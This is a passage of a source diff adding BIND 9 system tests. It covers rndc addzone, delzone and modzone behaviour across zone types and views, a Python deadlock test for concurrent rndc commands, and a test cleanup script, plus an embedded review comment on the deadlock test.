rndc.out.ns2.$n > /dev/null || ret=1 +_check_delete_normally_loaded_zone() ( + $DIG $DIGOPTS @10.53.0.2 a.normal.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_delete_normally_loaded_zone || ret=1 + +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add primary zone with inline signing ($n)" +$RNDCCMD 10.53.0.2 addzone 'inline.example { type primary; file "inline.db"; inline-signing yes; };' 2>&1 | sed 's/^/I:ns2 /' +_check_add_primary_zone_with_inline() ( + $DIG $DIGOPTS @10.53.0.2 a.inline.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.inline.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_add_primary_zone_with_inline || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add primary zone with inline signing and missing file ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'inlinemissing.example { type primary; file "missing.db"; inline-signing yes; };' 2> rndc.out.ns2.$n +grep "file not found" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add secondary zone with inline signing ($n)" +$RNDCCMD 10.53.0.2 addzone 'inlinesec.example { type secondary; primaries { 10.53.0.1; }; file "inlinesec.bk"; inline-signing yes; };' 2>&1 | sed 's/^/I:ns2 /' +_check_add_secondary_with_inline() ( + $DIG $DIGOPTS @10.53.0.2 a.inlinesec.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.inlinesec.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_add_secondary_with_inline || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to delete secondary zone with inline signing ($n)" +ret=0 +retry_quiet 10 test -f 
ns2/inlinesec.bk.signed -a -f ns2/inlinesec.bk || ret=1 +$RNDCCMD 10.53.0.2 delzone inlinesec.example > rndc.out2.test$n 2>&1 || ret=1 +test -f inlinesec.bk || +grep '^inlinesec.bk$' rndc.out2.test$n > /dev/null || { + echo_i "failed to report inlinesec.bk"; ret=1; +} +test ! -f inlinesec.bk.signed || +grep '^inlinesec.bk.signed$' rndc.out2.test$n > /dev/null || { + echo_i "failed to report inlinesec.bk.signed"; ret=1; +} +n=`expr $n + 1` +status=`expr $status + $ret` + +echo_i "restoring secondary zone with inline signing ($n)" +$RNDCCMD 10.53.0.2 addzone 'inlinesec.example { type secondary; primaries { 10.53.0.1; }; file "inlinesec.bk"; inline-signing yes; };' 2>&1 | sed 's/^/I:ns2 /' +_check_restoring_secondary_with_inline() ( + $DIG $DIGOPTS @10.53.0.2 a.inlinesec.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.inlinesec.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_restoring_secondary_with_inline || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting secondary zone with automatic zone file removal ($n)" +ret=0 +retry_quiet 10 test -f ns2/inlinesec.bk.signed -a -f ns2/inlinesec.bk || ret=1 +$RNDCCMD 10.53.0.2 delzone -clean inlinesec.example > /dev/null 2>&1 +retry_quiet 10 test ! -f ns2/inlinesec.bk.signed -a ! 
-f ns2/inlinesec.bk +n=`expr $n + 1` +status=`expr $status + $ret` + +echo_i "modifying zone configuration ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'mod.example { type primary; file "added.db"; };' 2>&1 | sed 's/^/ns2 /' | cat_i +$DIG +norec $DIGOPTS @10.53.0.2 mod.example ns > dig.out.ns2.1.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.1.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 modzone 'mod.example { type primary; file "added.db"; allow-query { none; }; };' 2>&1 | sed 's/^/ns2 /' | cat_i +$DIG +norec $DIGOPTS @10.53.0.2 mod.example ns > dig.out.ns2.2.$n || ret=1 +$RNDCCMD 10.53.0.2 showzone mod.example | grep 'allow-query { "none"; };' > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'stub' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'stub.example { type stub; primaries { 1.2.3.4; }; file "stub.example.bk"; };' > rndc.out.ns2.$n 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'static-stub' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'static-stub.example { type static-stub; server-addresses { 1.2.3.4; }; };' > rndc.out.ns2.$n 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'primary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"." 
{ type redirect; file "redirect.db"; };' > rndc.out.ns2.$n 2>&1 || ret=1 +_check_add_primary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 && + grep "type redirect;" showzone.out.ns2.$n > /dev/null && + $RNDCCMD 10.53.0.2 zonestatus -redirect > zonestatus.out.ns2.$n 2>&1 && + grep "type: redirect" zonestatus.out.ns2.$n > /dev/null && + grep "serial: 0" zonestatus.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_add_primary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that reloading a added 'primary redirect' zone works ($n)" +ret=0 +sleep 1 +cp -f ns2/redirect.db.2 ns2/redirect.db +$RNDCCMD 10.53.0.2 reload -redirect > rndc.out.ns2.$n +retry_quiet 10 check_zonestatus 2 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that retransfer of a added 'primary redirect' zone fails ($n)" +ret=0 +$RNDCCMD 10.53.0.2 retransfer -redirect > rndc.out.ns2.$n 2>&1 && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that deleting a 'primary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone -redirect > rndc.out.ns2.$n 2>&1 || ret=1 +_check_deleting_primary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 || true + grep 'not found' showzone.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_primary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'secondary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"." 
{ type redirect; primaries { 10.53.0.3;}; file "redirect.bk"; };' > rndc.out.ns2.$n 2>&1 || ret=1 +_check_adding_secondary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 && + grep "type redirect;" showzone.out.ns2.$n > /dev/null && + $RNDCCMD 10.53.0.2 zonestatus -redirect > zonestatus.out.ns2.$n 2>&1 && + grep "type: redirect" zonestatus.out.ns2.$n > /dev/null && + grep "serial: 0" zonestatus.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_adding_secondary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that retransfering a added 'secondary redirect' zone works ($n)" +ret=0 +cp -f ns3/redirect.db.2 ns3/redirect.db +$RNDCCMD 10.53.0.3 reload . > showzone.out.ns3.$n 2>&1 || ret=1 +_check_retransfering_secondary_redirect() ( + $RNDCCMD 10.53.0.2 retransfer -redirect > rndc.out.ns2.$n 2>&1 && + $RNDCCMD 10.53.0.2 zonestatus -redirect > zonestatus.out.ns2.$n 2>&1 && + grep "type: redirect" zonestatus.out.ns2.$n > /dev/null && + grep "serial: 1" zonestatus.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_retransfering_secondary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that deleting a 'secondary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone -redirect > rndc.out.ns2.$n 2>&1 || ret=1 +_check_deleting_secondary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 || true + grep 'not found' showzone.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_secondary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that zone type 'hint' is properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"." 
{ type hint; file "hints.db"; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that zone type 'forward' is properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'forward.example { type forward; forwarders { 1.2.3.4; }; forward only; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that zone type 'delegation-only' is properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'delegation-only.example { type delegation-only; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'in-view' zones are properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'in-view.example { in-view "_default"; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "reconfiguring server with multiple views" +rm -f ns2/named.conf +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 + +echo_i "adding new zone to external view ($n)" +# NOTE: The internal view has "recursion yes" set, and so queries for +# nonexistent zones should return NOERROR. The external view is +# "recursion no", so queries for nonexistent zones should return +# REFUSED. This behavior should be the same regardless of whether +# the zone does not exist because a) it has not yet been loaded, b) +# it failed to load, or c) it has been deleted. 
+ret=0 +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.intpre.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.intpre.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.extpre.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.extpre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'added.example in external { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if ! $FEATURETEST --with-lmdb; then + echo_i "checking new NZF file has comment ($n)" + ret=0 + hcount=`grep "^# New zone file for view: external" ns2/external.nzf | wc -l` + [ $hcount -eq 1 ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +if $FEATURETEST --with-lmdb; then + echo_i "verifying added.example in external view created an external.nzd DB ($n)" + ret=0 + [ -e ns2/external.nzd ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking rndc reload causes named to reload the external view's new zone config ($n)" +ret=0 +$RNDCCMD 10.53.0.2 reload 2>&1 | sed 's/^/ns2 /' | cat_i +_check_rndc_reload_external_view_config() ( + $DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n && + grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null && + $DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n && + grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null && + grep 
'^a.added.example' dig.out.ns2.ext.$n > /dev/null +) +retry_quiet 10 _check_rndc_reload_external_view_config || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with newly added zone ($n)" +_check_rndc_showzone_newly_added() ( + if ! $FEATURETEST --with-lmdb; then + expected='zone "added.example" in external { type primary; file "added.db"; };' + else + expected='zone "added.example" { type primary; file "added.db"; };' + fi + $RNDCCMD 10.53.0.2 showzone added.example in external > rndc.out.ns2.$n 2>/dev/null && + [ "`cat rndc.out.ns2.$n`" = "$expected" ] +) +retry_quiet 10 _check_rndc_showzone_newly_added || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'added.example in external' 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_newly_added_zone() ( + $DIG $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! 
grep '^a.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_newly_added_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add zone to internal view ($n)" +ret=0 +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.pre.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.pre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'added.example in internal { type primary; file "added.db"; };' 2> rndc.out.ns2.$n +grep "permission denied" rndc.out.ns2.$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.ext.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to delete a policy zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'policy in internal' 2> rndc.out.ns2.$n >&1 +grep 'cannot be deleted' rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding new zone again to external view ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'added.example in external { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_adding_new_zone_again_external() ( + $DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n && + grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null && + $DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n && + grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null && + grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null +) +retry_quiet 10 _check_adding_new_zone_again_external || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr 
$status + $ret` + +echo_i "reconfiguring server with multiple views and new-zones-directory" +rm -f ns2/named.conf +copy_setports ns2/named3.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 + +echo_i "checking new zone is still loaded after dir change ($n)" +ret=0 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone from external ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'added.example in external' 2>&1 | sed 's/^/I:ns2 /' +$DIG $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding new zone to directory view ($n)" +ret=0 +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.intpre.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.intpre.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.extpre.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.extpre.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.5 -b 10.53.0.5 a.added.example a > dig.out.ns2.dirpre.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.dirpre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'added.example in directory { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.ext.$n > /dev/null || 
ret=1 +$DIG +norec $DIGOPTS @10.53.0.5 -b 10.53.0.5 a.added.example a > dig.out.ns2.dir.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.dir.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.dir.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $FEATURETEST --with-lmdb; then + echo_i "checking NZD file was created in new-zones-directory ($n)" + expect=ns2/new-zones/directory.nzd +else + echo_i "checking NZF file was created in new-zones-directory ($n)" + expect=ns2/new-zones/directory.nzf +fi +$RNDCCMD 10.53.0.2 sync 'added.example IN directory' 2>&1 | sed 's/^/I:ns2 /' +sleep 2 +[ -e "$expect" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone from directory ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'added.example in directory' 2>&1 | sed 's/^/I:ns2 /' +$DIG $DIGOPTS @10.53.0.5 -b 10.53.0.5 a.added.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "ensure the configuration context is cleaned up correctly ($n)" +ret=0 +rndc_reconfig ns2 10.53.0.2 +$RNDCCMD 10.53.0.2 status > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check delzone after reconfig failure ($n)" +ret=0 +$RNDCCMD 10.53.0.3 addzone 'inlinesec.example. IN { type secondary; file "inlinesec.db"; masterfile-format text; primaries { test; }; };' > /dev/null 2>&1 || ret=1 +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +$RNDCCMD 10.53.0.3 delzone inlinesec.example > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if ! 
$FEATURETEST --with-lmdb +then + echo_i "check that addzone is fully reversed on failure (--with-lmdb=no) ($n)" + ret=0 + $RNDCCMD 10.53.0.3 addzone "test1.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 + $RNDCCMD 10.53.0.3 addzone "test2.baz" '{ type primary; file "dne.db"; };' > /dev/null 2>&1 && ret=1 + $RNDCCMD 10.53.0.3 addzone "test3.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 + $RNDCCMD 10.53.0.3 delzone "test3.baz" > /dev/null 2>&1 || ret=1 + grep test2.baz ns3/_default.nzf > /dev/null && ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +_check_version_bind() ( + $DIG $DIGOPTS @10.53.0.3 version.bind txt ch > dig.out.test$n && + grep "status: NOERROR" dig.out.test$n > /dev/null +) + +echo_i "check that named restarts with multiple added zones ($n)" +ret=0 +$RNDCCMD 10.53.0.3 addzone "test4.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone "test5.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test/.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\".baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\\.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\032.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\010.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +stop_server ns3 +start_server --noclean --restart --port ${PORT} ns3 || ret=1 +retry_quiet 10 _check_version_bind || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA "test4.baz" > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.1.test$n > /dev/null || 
ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA "test5.baz" > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test/.baz' > dig.out.3.test$n || ret=1 +grep "status: NOERROR" dig.out.3.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.3.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test\\.baz' > dig.out.4.test$n || ret=1 +grep "status: NOERROR" dig.out.4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.4.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test\032.baz' > dig.out.5.test$n || ret=1 +grep "status: NOERROR" dig.out.5.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.5.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test\010.baz' > dig.out.6.test$n || ret=1 +grep "status: NOERROR" dig.out.6.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.6.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/addzone/tests_rndc_deadlock.py b/bin/tests/system/addzone/tests_rndc_deadlock.py new file mode 100755 index 0000000..7f4bf63 --- /dev/null +++ b/bin/tests/system/addzone/tests_rndc_deadlock.py 
@@ -0,0 +1,92 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+import concurrent.futures
+import os
+import subprocess
+import time
+
+
+def run_rndc(server, rndc_command):
+ """
+ Send the specified 'rndc_command' to 'server' with a timeout of 10 seconds
+ """
+ rndc = os.getenv("RNDC")
+ port = os.getenv("CONTROLPORT")
+
+ cmdline = [rndc, "-c", "../common/rndc.conf", "-p", port, "-s", server]
+ cmdline.extend(rndc_command)
+
+ subprocess.check_output(cmdline, stderr=subprocess.STDOUT, timeout=10)
+
+
+def rndc_loop(test_state, domain):
+ """
+ Run "rndc addzone", "rndc modzone", and "rndc delzone" in a tight loop
+ until the test is considered finished, ignoring errors
+ """
+ rndc_commands = [
+ ["addzone", domain, '{ type master; file "example.db"; };'],
+ [
+ "modzone",
+ domain,
+ '{ type master; file "example.db"; allow-transfer { any; }; };',
+ ],
+ ["delzone", domain],
+ ]
+
+ while not test_state["finished"]:
+ for command in rndc_commands:
+ try:
+ run_rndc("10.53.0.3", command)
+ except subprocess.SubprocessError:
+ pass
+
+
+def check_if_server_is_responsive():
+ """
+ Check if server status can be successfully retrieved using "rndc status"
+ """
+ try:
+ run_rndc("10.53.0.3", ["status"])
+ return True
+ except subprocess.SubprocessError:
+ return False
+
+
+def test_rndc_deadlock():
+ """
+ Test whether running "rndc addzone", "rndc modzone", and "rndc delzone"
+ commands concurrently does not trigger a deadlock
+ """
+ test_state = {"finished": False}
+
+ # Create 4 worker threads running "rndc" commands in a loop.
+ with concurrent.futures.ThreadPoolExecutor() as executor:
+ for i in range(1, 5):
+ domain = "example%d" % i
+ executor.submit(rndc_loop, test_state, domain)
+
+ # Run "rndc status" 10 times, with 1-second pauses between attempts.
+ # Each "rndc status" invocation has a timeout of 10 seconds. If any of
+ # them fails, the loop will be interrupted.
+ server_is_responsive = True
+ attempts = 10
+ while server_is_responsive and attempts > 0:
+ server_is_responsive = check_if_server_is_responsive()
+ attempts -= 1
+ time.sleep(1)
+
+ # Signal worker threads that the test is finished.
+ test_state["finished"] = True
+
+ # Check whether all "rndc status" commands succeeded.
+ assert server_is_responsive
diff --git a/bin/tests/system/allow-query/clean.sh b/bin/tests/system/allow-query/clean.sh
new file mode 100644
index 0000000..9914de7
--- /dev/null
+++ b/bin/tests/system/allow-query/clean.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after allow query tests.
+#
+
+rm -f dig.out.*
+rm -f ns*/named.conf
+rm -f ns2/controls.conf
+rm -f */named.memstats
+rm -f ns*/named.lock
+rm -f ns*/named.run ns*/named.run.prev
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/allow-query/ns1/named.conf.in b/bin/tests/system/allow-query/ns1/named.conf.in
new file mode 100644
index 0000000..a72cc87
--- /dev/null
+++ b/bin/tests/system/allow-query/ns1/named.conf.in
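Review bot: In `test_rndc_deadlock`, `test_state["finished"] = True` is reached only when the status-polling loop ends normally, so an exception there that `check_if_server_is_responsive` does not catch (it handles only `subprocess.SubprocessError`) would leave any live workers looping while the executor's exit waits for them; wrapping the polling loop in `try:` … `finally: test_state["finished"] = True` removes that hang. The futures returned by `executor.submit(rndc_loop, test_state, domain)` are discarded, so a worker that dies on an exception `rndc_loop` does not swallow goes unnoticed and the test can pass without the concurrent addzone/modzone/delzone load it is meant to apply; keeping the futures and calling `.result()` on each after the flag is set would surface that. `run_rndc` also passes `os.getenv("RNDC")` and `os.getenv("CONTROLPORT")` straight into the argument list, so an unset variable shows up as a `TypeError` from `subprocess` rather than a clear message. Indentation is lost on this page, so the exact nesting of the flag assignment relative to the `with` block is inferred.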
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
